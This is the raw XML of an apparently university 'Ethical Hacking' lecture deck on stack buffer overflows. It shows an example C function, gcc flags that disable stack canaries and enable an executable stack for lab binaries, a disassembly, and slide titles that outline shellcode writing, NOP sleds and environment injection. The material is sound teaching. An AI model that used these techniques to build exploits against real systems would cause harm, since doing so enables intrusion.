              <a:rPr lang="en-US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no process may trace a system process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 Second, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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no process may trace the process running </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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  <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>init(8)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 Third, if a process has its root directory set with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>chroot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>(2)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it may not trace another process unless that process's root directory is at or below the tracing process's root. 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Frame (Activation Record)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Tx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ex1.c: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>void function(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> a, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> b, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> c) { </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    char buffer1[8]; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    char buffer2[16];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>} </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="32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3200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>void main() { </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    function(1,2,3); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="32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3200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>gcc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -g -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mpreferred</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-stack-boundary=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>fno</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-stack-protector -o ex1 ex1.c</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin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0612" y="3630706"/>
            <a:ext cx="1470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align stack to </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>2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/>
              <a:t> = 4 byte boundary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3939989" y="4468905"/>
            <a:ext cx="833718" cy="466166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88535" y="6185639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disable canaries</a:t>
            </a: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rot="10800000">
            <a:off x="3343835" y="5916709"/>
            <a:ext cx="1344700" cy="453597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52503" y="3680075"/>
            <a:ext cx="2452831" cy="1200329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(this is how binaries are compiled on razor, along with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0"/>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>m32 and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0"/>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>z </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>execstack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A09DA-ED16-CE4D-AD28-A6111A7A5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89FE460-CB16-694E-B0BB-60D52ACBDF47}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="742657" y="2158875"/>
              <a:ext cx="737280" cy="5047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89FE460-CB16-694E-B0BB-60D52ACBDF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4017" y="2149875"/>
                <a:ext cx="754920" cy="5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54824584-35B0-9245-8E12-D7D2C38F2362}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="1395697" y="2197755"/>
              <a:ext cx="626400" cy="657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54824584-35B0-9245-8E12-D7D2C38F236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86697" y="2188755"/>
                <a:ext cx="644040" cy="67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A71746F0-3E10-4145-9855-91E65AAC437C}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="1517737" y="2201355"/>
              <a:ext cx="460080" cy="6768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A71746F0-3E10-4145-9855-91E65AAC437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08737" y="2192355"/>
                <a:ext cx="477720" cy="69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C907061D-B21D-C447-88FD-925EF4FC45D9}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="1362577" y="2188755"/>
              <a:ext cx="617760" cy="60948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C907061D-B21D-C447-88FD-925EF4FC45D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53937" y="2180115"/>
                <a:ext cx="635400" cy="62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57041C9D-604D-5241-8310-26AF05E603B7}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="1991137" y="2225475"/>
              <a:ext cx="288720" cy="60660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57041C9D-604D-5241-8310-26AF05E603B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82497" y="2216835"/>
                <a:ext cx="306360" cy="624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4" name="Group 223">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ACFE979A-21E4-AB41-B42C-55B8DE059232}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="693337" y="1853955"/>
            <a:ext cx="2609280" cy="1252440"/>
            <a:chOff x="693337" y="1853955"/>
            <a:chExt cx="2609280" cy="125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6E10B2C-F1A6-914F-A3FB-37F845BA8C0A}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="693337" y="1853955"/>
                <a:ext cx="77400" cy="1252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6E10B2C-F1A6-914F-A3FB-37F845BA8C0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84337" y="1845315"/>
                  <a:ext cx="95040" cy="12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7C0C23D-2830-974E-9D65-B7E46C9D0086}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="704857" y="1891035"/>
                <a:ext cx="1813320" cy="11718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7C0C23D-2830-974E-9D65-B7E46C9D008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95857" y="1882035"/>
                  <a:ext cx="1830960" cy="11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218067A-E901-F247-BFE6-472F31E11DD6}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="2693857" y="2106675"/>
                <a:ext cx="360" cy="338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218067A-E901-F247-BFE6-472F31E11DD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85217" y="2098035"/>
                  <a:ext cx="1800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359F4FE-44A7-5E44-855E-447D12DF2A93}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="2618977" y="2252475"/>
                <a:ext cx="1281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359F4FE-44A7-5E44-855E-447D12DF2A9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10337" y="2243475"/>
                  <a:ext cx="145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F3DFBB9-A2F2-5C4C-AE73-0D284A40BC01}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="2724817" y="2308275"/>
                <a:ext cx="186840" cy="197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F3DFBB9-A2F2-5C4C-AE73-0D284A40BC0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16177" y="2299635"/>
                  <a:ext cx="2044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C2EC620-A3FE-424C-9AB4-7C47F8EDF917}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="2906977" y="2314035"/>
                <a:ext cx="151560" cy="106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C2EC620-A3FE-424C-9AB4-7C47F8EDF91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897977" y="2305395"/>
                  <a:ext cx="1692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AD2498E-1FAA-0244-AE59-22D66000B0DA}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3017137" y="2209995"/>
                <a:ext cx="22680" cy="277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AD2498E-1FAA-0244-AE59-22D66000B0D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08137" y="2200995"/>
                  <a:ext cx="4032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3C245B0-F5BF-BE4B-9973-FA518F2AB288}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3152497" y="2117835"/>
                <a:ext cx="150120" cy="258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3C245B0-F5BF-BE4B-9973-FA518F2AB28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43497" y="2109195"/>
                  <a:ext cx="1677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2F7DC6A-2FD6-A54D-B91D-A752D0B3DC91}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3092377" y="2264715"/>
                <a:ext cx="975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2F7DC6A-2FD6-A54D-B91D-A752D0B3DC9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083377" y="2256075"/>
                  <a:ext cx="115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37627C5B-DDF1-1849-B2CA-239647CD6871}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="885937" y="2180115"/>
                <a:ext cx="464040" cy="64656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37627C5B-DDF1-1849-B2CA-239647CD687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76937" y="2171475"/>
                  <a:ext cx="481680" cy="66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1E37A094-82D6-EF45-B64B-718C9E7EFE02}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="-2176223" y="4339395"/>
              <a:ext cx="360" cy="36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1E37A094-82D6-EF45-B64B-718C9E7EFE0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2185223" y="433039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2" name="Group 251">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ABEBB6D6-31B1-1249-8AF8-8CD56658364E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1270417" y="2893995"/>
            <a:ext cx="515160" cy="1163160"/>
            <a:chOff x="1270417" y="2893995"/>
            <a:chExt cx="515160" cy="116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2CA2BADB-EFC9-0E4D-852C-714C4929C3DC}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="1270417" y="2927835"/>
                <a:ext cx="381600" cy="112932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2CA2BADB-EFC9-0E4D-852C-714C4929C3D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261777" y="2919195"/>
                  <a:ext cx="399240" cy="11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9BF0E727-CBA5-904A-9D71-BE628CDB9ED5}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="1503337" y="2893995"/>
                <a:ext cx="282240" cy="28944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9BF0E727-CBA5-904A-9D71-BE628CDB9ED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494337" y="2884995"/>
                  <a:ext cx="299880" cy="30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DB6E0840-A0C5-E74C-8ABD-0D83F1B572EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1571737" y="3467115"/>
            <a:ext cx="422280" cy="348480"/>
            <a:chOff x="1571737" y="3467115"/>
            <a:chExt cx="422280" cy="34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2F207019-C828-9944-8B67-7E83F87CB594}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="1666057" y="3467115"/>
                <a:ext cx="360" cy="29916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2F207019-C828-9944-8B67-7E83F87CB59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657417" y="3458475"/>
                  <a:ext cx="1800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4F669797-1A4D-5B4D-B8B9-A03871B5A929}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="1571737" y="3629475"/>
                <a:ext cx="236880" cy="2052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4F669797-1A4D-5B4D-B8B9-A03871B5A92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562737" y="3620835"/>
                  <a:ext cx="2545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57B92077-1350-2243-BBF9-B50571C8AA05}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="1766137" y="3488355"/>
                <a:ext cx="227880" cy="32724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57B92077-1350-2243-BBF9-B50571C8AA0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757137" y="3479355"/>
                  <a:ext cx="245520" cy="344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F03543F-6D0B-A243-B6EB-A1005996A1A0}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="5818297" y="4997835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F03543F-6D0B-A243-B6EB-A1005996A1A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809297" y="498883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8E0F906D-523B-C941-8CED-D7F62F34883E}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="5162017" y="3244275"/>
              <a:ext cx="360" cy="36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8E0F906D-523B-C941-8CED-D7F62F34883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153017" y="323563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023200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Digression on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/>
              <a:t>intel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1115"/>
            <a:ext cx="9144000" cy="369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47934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Disassembly, ex1 (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>att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209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/>
              <a:t>main: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0x080483a3 &lt;main+3&gt;:    sub    $0x10,%esp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0x080483a6 &lt;main+6&gt;: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movl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  $0x3,0x8(%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esp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0x080483ae &lt;main+14&gt;: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movl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  $0x2,0x4(%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esp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0x080483b6 &lt;main+22&gt;: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movl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  $0x1,(%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esp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0x080483bd &lt;main+29&gt;:   call   0x8048394 &lt;function&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1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46094" y="4005730"/>
          <a:ext cx="423134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3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dirty="0" err="1">
                          <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>esp</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" baseline="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baseline="0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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  $0x1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0x4(%</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" err="1">
                          <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>esp</a:t>
                      </a:r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  $0x2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0x8(%</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" err="1">
                          <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>esp</a:t>
                      </a:r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  $0x3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0xc(%</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" err="1">
                          <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>esp</a:t>
                      </a:r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   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original %</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" err="1"/>
                        <a:t>esp</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>  (before</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" baseline="0" dirty="0"/>
                        <a:t> sub)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9623" y="3998258"/>
            <a:ext cx="718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lower</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>addrs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1694" y="5755343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higher</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>addrs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44235" y="4392701"/>
            <a:ext cx="2348753" cy="147732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Equivalent to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push $dummy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push 0x3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push 0x2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push 0x1</a:t>
            </a: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69322</TotalTime>
  <Words>4529</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>661</Paragraphs>
  <Slides>54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Calibri</vt:lpstr>
      <vt:lpstr>Courier</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>Tw Cen MT</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Wingdings 2</vt:lpstr>
      <vt:lpstr>Median</vt:lpstr>
      <vt:lpstr>Ethical Hacking – Lecture 9</vt:lpstr>
      <vt:lpstr>Buffer Overflows</vt:lpstr>
      <vt:lpstr>Buffer Overflows (cont)</vt:lpstr>
      <vt:lpstr>Example</vt:lpstr>
      <vt:lpstr>Memory Organization</vt:lpstr>
      <vt:lpstr>Stack Frame (Activation Record)</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Digression on att vs intel</vt:lpstr>
      <vt:lpstr>Disassembly, ex1 (att)</vt:lpstr>
      <vt:lpstr>function()</vt:lpstr>
      <vt:lpstr>Stack at time of function() call</vt:lpstr>
      <vt:lpstr>ex3.c</vt:lpstr>
      <vt:lpstr>Overflowing buffer1</vt:lpstr>
      <vt:lpstr>Controlling the ret addr</vt:lpstr>
      <vt:lpstr>Shellcode</vt:lpstr>
      <vt:lpstr>Let’s just spawn a shell</vt:lpstr>
      <vt:lpstr>Digression on execve()</vt:lpstr>
      <vt:lpstr>execve() digression</vt:lpstr>
      <vt:lpstr>execve() counts argv entries</vt:lpstr>
      <vt:lpstr>shellcode.c: calling execve()</vt:lpstr>
      <vt:lpstr>Pop Quiz</vt:lpstr>
      <vt:lpstr>Disassemble shellcode binary</vt:lpstr>
      <vt:lpstr>We need this</vt:lpstr>
      <vt:lpstr>To save memory, just do this</vt:lpstr>
      <vt:lpstr>Shellcode Synopsis</vt:lpstr>
      <vt:lpstr>Writing Shellcode</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Shellcode on the stack</vt:lpstr>
      <vt:lpstr>Our shellcode</vt:lpstr>
      <vt:lpstr>inline.c</vt:lpstr>
      <vt:lpstr>dataseg.c: put shellcode into .data</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Next Problem… strcpy</vt:lpstr>
      <vt:lpstr>Getting rid of zeroes</vt:lpstr>
      <vt:lpstr>Changing two offending instructions</vt:lpstr>
      <vt:lpstr>dataseg2.c: amend two instructions</vt:lpstr>
      <vt:lpstr>We’re Done!  Well…</vt:lpstr>
      <vt:lpstr>Injection Options</vt:lpstr>
      <vt:lpstr>victim.c</vt:lpstr>
      <vt:lpstr>Typical Stack Ptr Values</vt:lpstr>
      <vt:lpstr>Poking around…</vt:lpstr>
      <vt:lpstr>Find addresses</vt:lpstr>
      <vt:lpstr>I use Python</vt:lpstr>
      <vt:lpstr>Note: addresses found in gdb are only approximate</vt:lpstr>
      <vt:lpstr>Going Sledding…</vt:lpstr>
      <vt:lpstr>Variants</vt:lpstr>
      <vt:lpstr>Passing shellcode in the env</vt:lpstr>
      <vt:lpstr>Buffer overflow, shellcode in the env</vt:lpstr>
      <vt:lpstr>Other injection spots</vt:lpstr>
      <vt:lpstr>Moral of the Story</vt:lpstr>
      <vt:lpstr>Get your gdbfu on</vt:lpstr>
      <vt:lpstr>More gdbfu</vt:lpstr>
      <vt:lpstr>Hey, wait… can’t I just gdb the victim?</vt:lpstr>
      <vt:lpstr>man ptrace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hacking 101</dc:title>
  <dc:creator>John</dc:creator>
  <cp:lastModifiedBy>Jack Blackburn</cp:lastModifiedBy>
  <cp:revision>880</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2006-08-16T00:00:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-10-19T18:39:49Z</dcterms:modified>
</cp:coreProperties>
</file>